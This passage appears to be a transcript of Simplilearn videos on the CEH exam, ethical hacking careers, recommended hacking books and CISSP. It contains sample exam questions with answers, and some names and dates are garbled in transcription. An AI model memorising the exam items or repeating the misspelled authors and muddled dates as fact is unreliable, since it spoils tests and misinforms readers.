2.9 million accounts as stolen. In 2016, Kaspersky, which is an internet security firm, announced that there were 758 million malicious attacks that occurred worldwide. Imagine that, 758 million malicious attacks that were identified and reported. In 2018, Facebook reported a loss of 30 million accounts that were stolen. 2018 again, Quora reported 100 million customer accounts being stolen. And in 2018 again, Marriott, 500 million travelers' accounts stolen and manipulated. Now, when you say accounts were stolen, how does it affect the organizations? Now, first and foremost, if those accounts were stolen, that means usernames and passwords were cracked, and those accounts may have contained credit card information or may have contained some personal information that would identify the person and thus make them gullible for a social engineering attack or an identity theft attack. So it has a cascading effect. If I would have been affected, or you would have been affected with these attacks, the repercussions would have been catastrophic. Your credit card information being stolen, that means somebody else would have misused it, and you would have seen a huge bill come your way. Now, you can go back to the bank and dispute that, but that's again a dispute that you're trying to have with the bank for something that you didn't do, which requires a lot of energy and a lot of time. And at the end of it, somebody has to pay for that particular loss. Now, in this scenario, the bank would have had to bear the loss, but then that's a loss for the bank, and bank doesn't want to do that. And that's where they would try to hire certified ethical hackers who would try to test these vulnerabilities and plug them in so that the end consumer is also secured, the bank is also secured, right? In this case, Marriott, there were 500 million travelers' accounts that were stolen. A lot of credit card information was leaked out. Email accounts were hacked and compromised, and thus there was a lot of repercussion that happened. Now, the thing is that there are also laws that these organizations need to adhere to that tell the organizations how to keep their information secure, and also have penalties in place if the organization gets hacked. And the penalties are pretty severe. So organizations do not want to get hacked or do not want to get compromised, not only from the customer's perspective, where they would be losing customers, losing reputations, and then thus facing losses, but also from a legislative perspective, where they would have to pay fines to the government for the frauds that have happened. So these are some of the popular hacking cases that have cost these organizations quite a lot of money, and thus they have a lot of security in mind. If you look at the news, in BBC News, there was something reported from a French police that there was a virus that infected more than 850,000 computers worldwide. Now, on the similar lines, if you remember ransomwares, and if you look at WannaCry that happened in 2018 or 2017, it also cost the world $4 billion in losses during that just one small month of its infection. Then Google basically disclosed that a large-scale hacking effort was targeted at Apple devices. And this has been, it has reported that there was a sustained effort to hack iPhones over a period of at least 2 years, which means that there's a specific target towards Apple consumers, and they are at a higher risk of getting hacked than others. Then the Texas government organizations hit by ransomware attack. So hackers have infected 23 organizations connected to local government in the US state of Texas with ransomware. That means that their databases have been encrypted. The government themselves do not have access to that database. The databases could have been compromised by the hackers. And that means that whatever services were being provided to the users based on that database may no longer be available to the end users because of the ransomware. Now, moving on with these, why do we want to become a certified ethical hacker? Increased attacks lead to more job openings. Now, if you look at ransomware, the WannaCry attack that happened in 2017, there was a knee-jerk reaction given by the rest of the world for IT security. Suddenly budgets started opening up. Suddenly people wanted more ethical hackers on their payrolls to test for vulnerabilities. In UK and Europe, we have GDPR, which is again another law that imposes severe penalties on organizations that get hacked and for not having proper security and a vulnerability assessment and penetration testing program in place. So that leads to a lot of job requirements as well, where organizations look at people with this special skill set to help them mitigate the vulnerabilities, to safeguard them and their customers from hackers and also from penalties from law enforcement and governments. So thus the demand keeps on increasing for ethical hackers, which automatically means that the salaries are going to increase as well. So more the demand, lesser the supply, higher the salaries. That's plain economics. Then challenge hacker with malicious intent. So from an ethical hacker's perspective, it is our duty to safeguard an organization, which means that will be pitched against hackers, and we have to ensure that those hackers would be challenged to the maximum limit before they even try to get access to any of the resources that we are trying to protect. It offers a boost in your career, so more efforts that you put in, more vulnerabilities that you find, the better the career prospects that you have, and the better job aspects that you're going to get. And this also lets you keep yourself updated on the latest technology. As the technology progresses, as we evolve on technology, security will also evolve, and the ethical hacker would need to keep themselves updated on these technologies.
So why do we want to get the certification, and what would it mean by being a CEH certified individual? Take this into consideration. You are applying for jobs, and you have been applying for cybersecurity related jobs, of course, and you go in for an interview. In the interview, you are asked quite a few questions, and they will be testing you on cybersecurity concepts. So they will be asking you a lot of technical questions about cybersecurity, about information security, and any other related topic. So let's say in a few minutes into the interview, there are some concepts that you have not brushed your skills upon, and they ask you about certifications. And one of the main certifications that is sought after is the CEH certification. And if you're not certified, that's where things can become a little bit problematic, where organizations today very proactively start looking for people or candidates who are already certified rather than take them on board and get them certified. So in this scenario, having a certification would obviously help not only to be shortlisted for the job, but the certification involves a lot of training which would help you understand the concepts and prepare you for the interview a lot better as well, right? So getting yourself certified is quite necessary in today's world. Let's look at what the certification is all about. The certification involves a very hands-on training that trains an individual into thinking about cybersecurity from a hacker's perspective. And developing this mindset is very important, because to catch a thief, we have to think like a thief. Teaches the candidate to spot vulnerabilities in a system, so it trains you on how to identify flaws, how to verify that they exist, and then how to treat them as well. Like I said, this is a very sought after certification, and companies look for people who are already certified as CEH, or a certified ethical hacker. So what is this certification all about? This is a globally accepted certification, and it tests the knowledge that a candidate will have about threats and their preventive mechanisms. So the certification, the exam itself will test you on the parameters. The training would provide you with all the information that you require to clear the exam and to gain knowledge from a real world perspective. So it will train a candidate to think like a hacker. It will train the candidate to use the tools to identify those flaws, to spot those flaws in the first place. And it will give an understanding to the candidate where to look for those flaws in the first place. So essentially, when you get certified as a certified ethical hacker, you become a white hat hacker or an ethical hacker, which means that you will be looking at flaws ethically and reporting them to those organizations. The certifying authority is the EC Council. It is a very well known and a widely accepted certification authority across the globe. It is based out of the United States, but the certification is valid across the globe. So what does it take to take the exam, and who can take the exam in the first place? Now, the basic criteria is that a candidate should be 18 years and above. So any person who has completed an official EC Council training is eligible to attempt the exam without going through an application process. So there are two ways you can actually attempt the exam. You either have work experience, that means you're already in the cybersecurity space, you already have some hands-on knowledge, and you want to give the exam. In that scenario, you just have to prove that you've got 2 years of experience with network or information security, and then you can apply to EC Council to directly appear for the exam without attending the training. Else, you can then approach EC Council and register yourself for a training course, after which you can give the exam. So there are two ways that you can deal with it. What are the fees for these exams? Now, the fee itself is $500 for the exam. Candidates who take the second route, where they prove that they have experience and they directly want to appear for the exam, there is another additional $100 of application fee that they have to pay to EC Council for them to verify that you actually have that experience and then allow you to appear for the exam. So what are the exam questions like? What is the exam all about? The exam code is 312-50, and there are 125 questions that need to be answered in 4 hours. Now that sounds like a lot of time, but trust me, it isn't. The questions are descriptive in nature. They give you a scenario. You have to identify those keywords based on the knowledge and the understanding that you have, and then gauge the correct answer for that particular scenario. And the scenarios could be a little bit complex, could be a little bit confusing. The exam will be a multiple choice question exam, so 1 question with 4 answers. If any question has multiple answers, they will mention it in the question itself. The pass percentage cuts off at around 60 to 85%. So there is no fixed percentile. Every question has a different grade, every question has a different value, and based on the questions that you have been asked and the correctness of the answers, you would either pass somewhere between 60 to 85%. The results are immediate, so once you complete the exam and you submit it, it will let you know there itself whether you have cleared or not. So what are the skills that you require for this exam? You must have very good networking skills. And when we say networking skills, you should know your protocols. You should know how computers communicate with each other. The protocols like HTTPS, FTP, SMTP, and anything about the OSI layer. You should be good with your operating systems. The candidate should also have a very good knowledge about operating systems. And when we say operating systems, we want the candidate to know about troubleshooting methods and how the operating system work in the first manner. So you should have some basic skills about operating systems and the configuration of these operating systems. You should also know the different types of cyber attacks such as social engineering, phishing, and how to prevent these attacks. So this is the exam skills. The training prepares you with all these skills. The candidate must be able to hack into an organization system with permission and erase all digital evidences. So the training itself will get you accustomed with all the hacking phases, how a hack is constructed, how a hack is made more effective, and how the hack evolves, and later on how you can delete all the evidences of the hack that has happened. So for the exam, you should have, or you should be very good with your networking skills, understanding protocols and how they work, configuring operating systems and troubleshooting them. You should be able to classify different cyber attacks and know how to launch them as well. And you should be able to hack into devices and erase all digital evidences that may have happened. Password cracking and cryptography is also a very much required skill to clear the exam. There must be a few rules followed, and there is a code of ethics from EC Council. So they essentially give you a non-disclosure agreement before you start the training, which you have to go through, and you have to sign it, submit it to EC Council. Only then are you allowed to go forward with the exam. So what are the exam all about? What are the topics within that exam, and what kind of questions would you get? So there are 7 domains in this training based on which they will ask you questions. When you say background, background is nothing but your knowledge on networking skills, your knowledge on a little bit of operating systems, how communications happen, how protocols work, and so on and so forth. Analysis would be where you analyze certain attacks and you're able to analyze, let's say, packets, and based on those packets, you can identify whether it's a legitimate packet or is it a malicious packet with any malicious data within it. Then with security tools, you are able to talk about security as in the concepts of security like confidentiality, integrity, and availability triad, the IAAA identification, authentication, authorization, and accountability aspects, and various other concepts that are there in security. So you'll be questioned on those topics as well. Tools and programs. Ethical hacking carries a lot of tools, and you should be conversant with those tools. During the training, there will be hundreds of tools that you would be going through, and you would be facing questions on these tools. So there would be some basic questions like commands that would be given to you to identify what that command would execute, or there would be a specific scenario given to you, and then they would ask you which is the most suitable tool that you would utilize to crack that particular scenario. And then there's the methodology, of course, of how or which steps would you take in this particular attack to be successful. Then we talk about policies and the ethics. So as you can see, all of these domains have different weightage in the exam. 21.79% for your backgrounds. So you can see the background information is very much important. Operating systems, networking, a little bit of applications, a little bit of architecture of how things are deployed. Now, CEH is normally an advanced certification, right? So there are a few presumptions that you already know a little bit about Active Directory, how operating systems work, how identity management works. So there's a little bit of presumption that you have these background knowledge, but in the training you can be prepped up for that knowledge as well. So it does contain a little bit of insights about how these things work. Analysis is where you're looking at some scenarios, and based on the evidence is given to you, you can analyze what's going on. So that's at 20.73%. Security, which is the main topic, is at 23.73%. Tools and programs related to security would be at 28.91%. The methodologies would carry a weightage of 8.77, policies 1.90, and ethics 2.17%. So you have 125 questions. You can figure out percentile wise how many questions you would get on each of these domains. So let's have a look at these domains a little bit more. The background is about network and communication technologies. Again, like I said, protocols, procedures, services, how computers work. So ports on a computer, how ports are utilized by services, and how communications happen over these services and these ports. How we can scan these ports to identify what's going on and then try to find out vulnerabilities within them. Then we have got information security technologies and the information security threats as well. So when I want to launch an attack on a device, where would I find vulnerabilities? Is it just on the network? Do I look at the operating system? Do I look at different applications that are there on the operating system, and so on and so forth? So where are the threats? That's something that we need to identify, and that's what this domain deals with. So 27 questions from this domain. Then analysis and assessment, information security assessment and analysis, and the security assessment process. So let's say you're in a penetration test and you want to launch an attack. What is the assessment that you want to do before you launch that attack? What is the process you want to conduct? And how you're going to analyze the vulnerability in the first place to identify which penetration test or which attack you should do at that particular point in time. Then security would talk about information security controls. Controls would be all the security elements that you can implement to prevent hacking. So firewalls, IDS, IPS, antiviruses or endpoints, all of these would be included in this domain. Information security attack detection. So it's not only about how you can attack, you also want to know if you're being attacked in the first place. So analysis would basically identify how you're being attacked, and the detection is where you first detect that something is wrong, after which you can analyze it, right? And how you can prevent security attacks happening at your organization as well. So which firewall would fit at what OSI layer, what in the architectural aspect, where do you want to place an IDS or an IPS, where would you want to place a firewall, where would you want to place a UTM, to have a layered approach, a structured approach towards security, where a hacker would have to peel off layers of security to reach the data that they wanted to get access to in the first place. So there will be 30 questions from the security domain, 16 questions on the analysis and assessment domain. The fourth domain is the tools, systems and programs. So this is where all the tools that you would have utilized resume. So this is where all the tools that you have utilized in the ethical hacking scenario, and there will be questions asked about those tools. So in the training, there are some tools that are prescribed in the course where you'll have to concentrate on those tools. You'll have to get your hands on those tools to understand how those tools work and then give appropriate answers in this domain. So there would be 36 questions for tools, systems and programs. Then the fifth domain is procedures and methodology. Information security procedures and assessment methodologies would be asked over here. So how would you conduct a test? How would you conduct a vulnerability assessment? What is the method and the procedures that you would follow in conducting these tests? So there would be around 11 questions for this domain. The sixth one is regulations and policies. So this is all about some basics that you need to be aware about for information security policies and frameworks like ISO 27001, PCI DSS, and these regulations that are available in the real world that can help you
or guide you to place a security architecture on your organization. These questions are not going to be in depth about any of the laws or policies. It's just checking your awareness, whether you're aware of these laws or policies and where they can be implemented. So you can see there are only a couple of questions that would come in regulations and policies. And then ethics. Ethics is the code of conduct of how you are expected to behave as an ethical hacker, what is expected out of your job role, what you should be doing and what you shouldn't be doing. So there would be around 3 questions of ethics in the exam. Now let's look at a few sample questions from the exam as well. So this will help you get an idea what the exam questions would be. So consider the attack scenario given below. There are 5 steps listed. Step 1 starts with user browses a web page. The second step is where web server replies with the requested page and sets a cookie on the user's browser. In the third step, attacker steals the cookie by either creating an attack on the network for sniffing, or at the application with cross-site scripting, or sending a fake mail or hosting a fake website by a social engineering attack, which is a phishing attack. In the fourth step, attacker gets access using whatever they have done and orders a product using modified cookies. And in the fifth step, the product is actually delivered to the attacker's address, whereas the bill is footed by the victim. So what is the attack that is happening here? Identify the web application attack. Is it a session fixation attack? Is it a unvalidated redirect attack? Is it a cookie poisoning attack, or is it a denial of service attack? So again, going through these steps, which of these would be the correct answer? In this scenario, it is C, which is a cookie poisoning attack, because if you look at the steps, the attacker basically hijacked the cookie or stole the cookie and then modified it to be utilized for some malicious reasons. Second question, which one of the following scanning techniques do attackers use to bypass firewall rules, logging mechanisms, and also hide themselves as usual network traffic? A. Stealth scanning technique. B. TCP connect scanning technique. C. Maintaining access. Or D. FIN scanning technique. Now here, as you can understand, we need to know what these techniques are, right? So what does a FIN scan mean? What is maintaining access? What is TCP connect? What does TCP mean? TCP is transmission control protocol. How does it work? So when you connect using TCP, what is actually happening in the backend? That is what the knowledge is all about. And in here, the correct answer is A, stealth scanning technique. So what do we mean by stealth? How can we achieve that? Which tools help us achieve that? That is what we want to gain an understanding in before we can attempt the exam. Question 3. Which of the following Wi-Fi chalking method refers to drawing symbols in public places to advertise open Wi-Fi networks? War walking, war flying, war chalking, or war driving? Now, here we need to know first that there is something known as Wi-Fi chalking, right? And there are some symbols that are utilized globally and they are recognized globally. They're standardized, by the way. And these symbols represent some type of Wi-Fi networks. For example, open Wi-Fi, which means you can freely connect to the Wi-Fi, or paid Wi-Fi, where you have to pay before you can connect to the Wi-Fi, or once you get connected, you're first to have to make a payment, only then the internet would be activated, right? So for different Wi-Fi mechanisms, there are different options that can be utilized, and the question is which of the Wi-Fi chalking method refers to drawing these symbols in public places to advertise open Wi-Fi. So in this, the answer is war chalking. Now the question here itself is a little bit, so here the question itself is a little bit misleading, because it mentions Wi-Fi chalking in the question itself, and that would then lead us to whether war chalking is a correct answer or not. So some of the questions could be a little bit misleading.
With the increase in the number of cybercrimes across the globe, there is also an increase in the number of cybersecurity jobs, and the role of an ethical hacker tops the list. Hi guys, this is Shruti from Simply Learn, and today I will run you through this video on ethical hacking career. So let's get started and explore the world of ethical hacking. Let's begin with a few facts. Did you know that by the year 2021, there will be 3.5 million cybersecurity job openings? That is a huge number, isn't it? And also, according to the US Bureau of Labor Statistics, there will be 28% increase in the number of jobs from 2016 to 2026 for information security analysts, which includes ethical hackers. This proves that there is a great demand for ethical hackers at the moment. As I mentioned earlier, the number of cybercrimes across the world will increase as the digital era will only continue to grow. Organizations will be on the lookout to hire professionals who can fight these cybercrimes and protect the company's data. And to fight these cybercrimes, we will require individuals who can think like a hacker. And who is that? Well, to do this job, we have ethical hackers. As you might be knowing, an ethical hacker is trained to discover system vulnerabilities. An ethical hacker is also known as a white hat hacker. He or she is given authorization from the company to perform security assessments. And at the end, an ethical hacker would have to report the findings back to the company so that the vulnerabilities can be fixed. An ethical hacker performs these security assessments with the help of various hacking techniques and tools. Let's now move on to our next topic, that is the steps to become an ethical hacker. You might wonder how to start your ethical hacking career, right? Well, I will take you through that step by step. Firstly, the candidate must have a computer science or an information technology bachelor's degree. It is also possible to become an ethical hacker without these degrees, but provided you have the required skill sets and experience. The next requirement to be an ethical hacker is that the candidate must have a minimum of 2 years of experience in the information security field. You have to start your career with a software or a networking job, and only then can you move on to the ethical hacking field. You have to start your career with a software or a networking job, and only then can you move into the ethical hacking field. Coming to the certifications, it is necessary for the candidate to hold various cybersecurity certifications. Certifications play a vital role in the field of cybersecurity. Your job opportunities can solely depend on these certifications. To become an ethical hacker, you can start off with the foundational level certifications such as the CCNA and CompTIA Security Plus certifications. Finally, the last step to become an ethical hacker is to clear the Certified Ethical Hacker examination. CEH certification is provided by the EC Council. It trains the candidate to protect a company's network by using the same tools and methods that a hacker would use. The CEH exam will have a duration of 4 hours with 125 number of questions. If the candidate clears this exam, then he or she will become a certified ethical hacker. Now that you know the steps to become an ethical hacker, let's look into the skill sets which are required to help you achieve these steps. First and foremost, an ethical hacker needs to have an in-depth knowledge of the working of the operating systems. Knowledge of Windows, Linux, and Macintosh operating systems is required. For penetration testing, creating exploits, and bug hunting, programming will be important. So knowledge of programming languages such as C, C++, HTML, Python, and PHP will be very helpful. Basic knowledge of networking, TCP/IP protocols, and OSI model is necessary as networking is the foundation of cybersecurity. For securing databases, knowledge of SQL, NoSQL, PostgreSQL is necessary. Cryptography is used to secure information. It is the process of converting data from a readable format to a non-readable format and vice versa. Cryptanalysis is decryption without a secret key. In most cases, certified ethical hacker would need to perform cryptanalysis. Hence, ethical hacker has to be comfortable with cryptography and cryptanalysis. Ethical hackers should be proficient in network security control measures such as intrusion detection and intrusion prevention techniques. Now let's move on to the responsibilities which are taken care of by an ethical hacker. Let's have a look at these responsibilities. An ethical hacker is responsible for scanning systems, open and closed ports using tools like Nessus and Nmap. Vulnerabilities and threats are identified by doing this. In addition to scanning for vulnerabilities, they also search the deep corners of the network to spot critical information such as passwords, which can make the organization vulnerable to an attack. In addition to building and maintaining IDS, IPS, and firewalls, they also try to evade these security measures to gauge the performance of the systems. A lot of times, a company's online fraud or online theft incidents are looked into by an ethical hacker. An ethical hacker also checks for sniffing networks and hijacked web servers and applications. Those were the responsibilities of an ethical hacker. Now let's look into the various job roles an ethical hacker can apply for. It is a misconception that an ethical hacker will perform only penetration testing. Well, there are a number of other jobs an ethical hacker can apply for. The different job roles such as that of a penetration tester, information security analyst, security consultant, and an information security manager. Let's have a look at each of these job roles one by one. A penetration tester performs the typical responsibility of an ethical hacker. That is, he or she tries to exploit a security system's vulnerabilities. This is carried out using different hacking tools and techniques. An ethical hacker can also apply for the role of an information security analyst. There is a difference between the job roles of a penetration tester and that of an information security analyst. Here, the candidate will be required to primarily design and protect the organization's network from various cyber attacks. Finally, the candidate is also required to document the identified security breaches so that it can be omitted the next time. The responsibilities of a security consultant is more or less similar to that of an information security analyst that we saw previously. As a security consultant, you will be responsible to design, implement, and maintain various security architectures. In addition to this, you're also required to upgrade the security systems as and when required. Finally, an ethical hacker can also apply to the role of an information security manager. As the name suggests, this role will require the candidate to possess managerial skills, as an information security manager is responsible to head the IT and the information security team. Now that we have seen the responsibilities, the skills, and the steps to become an ethical hacker, let's have a look at the different companies hiring ethical hackers. To name a few, we have Bank of America, Ernst & Young, KPMG, Urban Pro, and IBM. Let's now look into the salary structure of an ethical hacker. Well, in India, the average annual salary of a certified ethical hacker is nearly 4,76,000 rupees. And in the US, the average annual salary of a certified ethical hacker is $91,000. Now I will guide you through a sample resume of a penetration tester. As you can see on your screens, this is a sample resume of a penetration tester. We will look into this resume closely and understand how your resume should look like if you are applying for the role of a penetration tester. As always, you can start off with your name and your email ID and your phone number, followed by a brief summary of your current job profile. It is preferred to add your LinkedIn profile link here and also your GitHub profile link if you have one. As I mentioned earlier, this is a sample resume for a penetration tester, and hence we have to have more than 2 years of experience in the information security field. As you can see under the experience section, the candidate has 2 prior experiences, out of which the first experience is that of a software tester and second is that of a penetration tester. You would have to mention your latest or current experience at the beginning. You can mention your job role and the company and the duration, under which you can list out the various responsibilities that you are looking into currently. If you are a penetration tester, you can mention responsibilities such as security monitoring, black box testing, documentation of the results, vulnerability scanning, and so on. Below this, you can mention your first company's experience with the roles and responsibilities that you have performed earlier. Here, the candidate was a software tester before becoming a penetration tester. Let's move on to the education section. Here, the candidate holds a bachelor's degree in computer science. You can mention your degree followed by the university name. Or if you're applying for any other role in the cybersecurity domain, it is recommended that you list out the certifications as well. To start off with, a CCNA certification will be preferred, followed by a certified ethical hacker certification, which is a must if you are applying for the role of a penetration tester. In addition to it, the Certified Expert Penetration Tester certification will also hold a great advantage. After mentioning the certifications, you can go ahead and mention your skill sets. Here we have the technical skills and non-technical skills. Under technical skills, you can mention the programming languages that you know. Here we have C, C++, Java, Perl. You can also mention the operating systems that you have worked on. For example, Windows, Linux, Unix. And in addition to the programming languages and the OS, you can also mention the tools that you know, such as Nmap, Metasploit tools, which will be helpful if you are applying for the role of a penetration tester. Then you can also mention encryption technologies, knowledge of SQL, and bug tracking systems if you have worked on them before. If you have participated in eCodeathons, you can mention that here as well. Under the non-technical skills, you can mention various competitions that you have taken part in and the games that you like, and other extracurricular activities. Finally, you can also mention the projects undertaken. Under the projects undertaken, you can talk about the various projects that you have performed in your company or outside the company. Here, we have two projects, one as a software test engineer and second one as a penetration tester. So this is how a resume of a penetration tester will look like. Before jumping into the best books for ethical hacking, let's speak a bit about cybersecurity. I'm sure you all already know what cybersecurity is, but here's a refresher. Cybersecurity refers to the practice of protecting networks, programs, computer systems, and their components from unauthorized digital access and attacks. Did you know that according to the University of Maryland, hackers attack every 39 seconds? That is, on an average, 2,244 times a day? Now that's a huge number. Speaking of hacking, let's define the term ethical hacking before diving into the books for it. So when a system's vulnerabilities are discovered and exploited with the motive of ensuring system security, it is known as ethical hacking. People who carry this out are termed as ethical hackers. Ethical hackers perform hacking with prior permission from the concerned authorities. In order to perform this and carry out penetration testing, various hacking techniques and tools are used. Now let's go ahead and have a look at how books can help you learn to hack. The books we are going to talk about in this live session will familiarize you with hacking on the whole. These books will introduce you to new ideas and help you solve problems. Reading in general is great as it helps with your thought process and keeps you mentally alert. It is important that you use the information in the upcoming books only for lawful purposes. So let's get started and see the best books which can help you with hacking. The first book we have is The Basics of Hacking and Penetration Testing. This book is written by Patrick Ingebretson. For all your beginners out there, if you're clueless about how to go about hacking, then this is a good read for y'all. Having said that, this book is not just for beginners, but even for those individuals who are only exposed to superficial penetration testing logic. This book dives deep into the tools and processes that are used by penetration testers to gain access to the systems. The Basics of Hacking and Penetration Testing book will help you achieve a better understanding of offensive security as well. You'll be acquainted with various phases of ethical hacking here. The book contains 7 chapters and it focuses on hacking tools such as Backtrack Linux, Google Reconnaissance, Nmap, Nessus, Metasploit, and Hacker Defender Rootkit to name a few. The fun part is that each chapter consists of hands-on exercises that help you interpret and implement results in each phase. This book is apt for students, beginning InfoSec professionals, and security consultants. The second book we have is Hacking, A Beginner's Guide to Computer Hacking, Basic Security, and Penetration Testing. It is written by John Slavio. This is yet another go-to book for beginners. This book can be your first step to a career in ethical hacking. It will cover all the basics with respect to hacking, security, and pen testing. The tools covered in this book are history of hacking, types of hackers, various types of hacking attacks, basic hacking tools and software, and hiding IP address. It also speaks about mobile hacking, hacking an email address, penetration testing, and spoofing attacks. Up next, we have Hacking, the Art of Exploitation. It is written by John Erickson. This book has 2 editions, one which was published in 2003 and the other in 2008. This book is famous for the hacking approach it teaches. It focuses on network security and computer security. It helps you understand how to develop exploits rather than just using them. If you want to up your ethical hacking game, then this book definitely requires a read. Hacking, the Art of Exploitation in its 2nd edition introduces you to C programming from a hacker's perspective. Out of the plethora of concepts that you will learn in this book, few crucial ones are that you will learn to program computers using C and shell scripts. You will also be able to outplay security measures like intrusion detection systems. Having said that, you will also learn to hijack TCP connections, crack encrypted wireless traffic, and speed up brute force attacks. Let's now have a look at the next ethical hacking book on our list, and that is Kali Linux, an Ethical Hacker's Cookbook. This book revolving around Kali Linux is written by Himanshu Sharma. Kali Linux is primarily used for advanced penetration testing and also for security auditing. It contains numerous tools that are geared towards various security tasks such as security research, penetration testing, and so on. This book will help you get started with installation and configuration of Kali Linux, which will enable you to perform your tests. In addition to that, you will learn to perform web application exploitation using tools such as Burp. You will also be acquainted with performing network exploitation using Metasploit and Wireshark. Lastly, you will know how to conduct advanced penetration testing. These were few of the concepts you will be learning besides a lot more others in the book. At number 5, we have Metasploit, the Penetration Tester's Guide. This book is written by 4 authors, David Kennedy, Jim O'Gorman, Devon Kearns, and Marty Aharoni. The Metasploit framework is a powerful tool for hackers to exploit IP addresses and ports in it. This framework makes discovering and exploiting vulnerabilities easy. But for first-time users, it can be a little tricky. Hence, this book will teach you all about Metasploit. You will learn the framework's interfaces, module system, and more as you launch simulated attacks. After which, you will move on to advanced penetration testing techniques, which include network reconnaissance, client-side attacks, wireless attacks, and targeted social engineering attacks. You will also learn to integrate Nexpose, Nmap, and Nessus with Metasploit to automate discovery. Up next, we have Penetration Testing, a hands-on introduction to hacking. This book is written by Georgia Wiedemann. As the name suggests, this book throws an insight into penetration testing. A penetration tester discovers security weaknesses in operating systems, networks, and applications. Penetration techniques are used to gauge enterprise defenses. This book focuses on the core skills and techniques a penetration tester requires. Here, you'll go through the prime stages of an actual assessment, which includes gathering information, unravel vulnerabilities, gaining access to networks, and so on. In addition to the above, you will learn to crack passwords with the techniques of brute forcing and word lists, bypass antivirus software, automate attacks, and you will also learn to use Metasploit framework for launching exploits and for writing your own Metasploit modules out of the many other learnings. Moving on to our next book, we have The Hacker Playbook 3. The Hacker Playbook 3, Practical Guide to Penetration Testing, is written by Peter Kim. This is the third iteration of the Hacker Playbook series. It brings with itself new strategies, attacks, exploits, tips, and tricks. Besides all the new concepts, it also highlights a few techniques from the previous versions. Many schools have this book incorporated in their teaching. The Hacker Playbook 3 Red Team Edition acquaints you with the Red Team. Red Teams simulate real-world advanced attacks to test your organization's defensive teams. A Red Teamer will accurately test and validate the overall security program. Reading the Hacker Playbook 3 will help you advance your offensive hacking skills and attack paths. In addition to that, it also focuses on real-world attacks, exploitation, custom malware, persistence, and more. This heavily lab-based book will incorporate several virtual machines and custom the Hacker Playbook tools. At number 8, we have Black Hat Python, Python programming for hackers and pen testers. Justin Seeds is the author of this book. As you know, Python is a very strong programming language and it comes to great use when creating powerful and effective hacking tools. Python is the chosen language by many security professionals across the world, and many exploit frameworks are written in Python. In this book, you'll go through the darker side of Python's capabilities like infecting virtual machines, writing network sniffers, creating trojans, etc. This book covers some networking fundamentals, interesting network tooling, web applications, Windows privilege escalation tricks, and more. This book, as the author says, is a fun read. Moving on, at number 9, we have the Web Application Hacker's Handbook, Finding and Exploiting Security Flaw. It is written by David Stoddard and Marcus Pinto. This new edition focuses on updated web applications, exposing them to attacks, and executing fraudulent transactions. This Web Application Hacker's Handbook is updated to speak about the latest step-by-step methods for attacking and defending the large range of ever-evolving web applications. It also discusses new remoting frameworks, HTML5, UI redress, and hybrid file attacks, to name a few. It looks into attacking authentication, attacking the application server, finding vulnerabilities in source code, etc. If you have already mastered the first edition, you can focus on new concepts in this one. Now let's head to our last book on our list. At 10, we have Web Security Testing Cookbook, Systematic Techniques to Find Problems Fast. The author of this book is Paco Hope and Ben Walther. Security testing is quite often a neglected one when it comes to the tests performed on web applications, but it is a very crucial one. This book teaches you how to check for the most common web security issues. It also acquaints you with installing and configuring free and good security testing tools. You will also understand how your application communicates with users, and this book will help you build tests pinpointed at AJAX functions and help you automate the tests. With the knowledge of this book and the free tools used here, you can defend your site. So those were the top 10 books for ethical hacking. Now that you had a look at the books, let's move on and see how Simplilearn can help you become an ethical hacker. Simplilearn provides a Certified Ethical Hacker CEH version 10 course. This CEH certification training course provides you hands-on training that will help you master the techniques used to penetrate network systems and defend your system against it. Simplilearn's ethical hacking course is aligned with the latest CEH version 10 by EC Council. Here, you will learn about Trojans, backdoors and countermeasures, IDS firewalls and honeypots, advanced hacking concepts, network packet analysis, mobile and web technologies, and advanced log management. This course content includes an introduction to ethical hacking, penetration testing, and ethical hacking concepts. It also speaks about SQL injection, IoT hacking, and cryptography, to name a few. There are no prerequisites to take up this certification training course. So let's start off this tutorial by understanding the need for the CISSP certification. If you have seen our previous videos, you would be aware of the various cybersecurity certifications like CCNA, CompTIA Security Plus, CISM, CISA, and CEH, to name a few. You might have also come across the CISSP certification. Let me tell you, this is one of the toughest and most in-demand certification in the cybersecurity field. In the current times, managing information security in a company can be extremely challenging. With the advent of the internet and various other technologies, there is a large exposure to various security breaches. The presence of information security experts in-house helps organizations manage their IT processes in a better way. This is where a CISSP professional is in demand by employers. Compared to the other cybersecurity professionals, the demand for CISSP certified professionals has grown rapidly. There are nearly 50,000 job postings for the same. Now that you have an idea of the demand of CISSP certified professionals, let's move on to understanding what exactly is CISSP. CISSP stands for Certified Information System Security Professional. It is considered the gold standard in the field of information security. This certification is taken up by IT professionals. It trains a candidate to become an information assurance professional. Taking up the CISSP certification will help you define the design, architecture, controls, and management of highly secure business environments. You will also be called a CISSP professional only after you successfully pass the CISSP exam. So now let's have a look into the CISSP exam requirements. The primary requirement for any candidate is that they should have at least 5 years of work experience in the field of information security. In addition to this, it is also suggested that the candidate clears other certifications like CCNA, CompTIA Security Plus, CEH, CISM, and CISA, to name a few. CISSP is considered as an advanced level cybersecurity certification. Hence, it is better if the candidate clears the basic level and the managerial level certifications before moving to the CISSP certification. As I mentioned earlier, this certification is suitable for professionals who have a minimum of 5 years of work experience. Professionals working as security consultants and managers, network and security architects, IT directors, security auditors, and chief information security officers can take up the CISSP certification. Let's now move on to our next topic, that is CISSP domains. This entire certification is grouped into a total of 8 domains. The broad spectrum of topics included in CISSP ensure its relevance across all disciplines in the field of information security. Successful candidates are competent in the following 8 domains. They are security and risk management, then we have asset security, security engineering, communications and network security, followed by identity and access management, then security assessment and testing, security operations, and finally we have software development security. These 8 domains deal with different aspects of information security. We will have a look into each of these individually and understand what each of these domains symbolize. First up, we have the security and risk management domain. As the name suggests, this domain mainly consists of the fundamentals of security policies, compliance law and regulations, professional ethics, risk management, and threat modeling. Cybersecurity and information security plays a major role in this domain. There is a difference between cybersecurity and information security which is more often missed out on by people. Cybersecurity refers to several techniques used to protect the integrity of networks, whereas information security refers to processes and tools deployed to protect sensitive information. To implement cybersecurity, we have a list of approaches like compliance-based, ad hoc, and risk-based. In compliance-based, security measures are decided based on regulations, while in ad hoc, security measures are based on no specific criteria. In risk-based, security measures are based on unique risks depending on the organization. Let's now have a look at the CIA triad. Here, C stands for confidentiality, I for integrity, and A for availability. Confidentiality, integrity, and availability have served as the industry standard for computer security since the time of the first mainframes. Confidentiality means that information and functions can be accessed only by authorized parties, for example, military secrets. Integrity means that information and functions can be added, altered, or removed only by authorized people. And availability means that systems, functions, and data must be available on demand. Now that we have understood the CIA triad, let's have a look at the GRC trilogy. This trilogy is a structured approach adopted by organizations to align IT objectives with business objectives. First up, we have governance. Such a program has motives like ensuring goals are achieved, providing strategic plans, and so on. 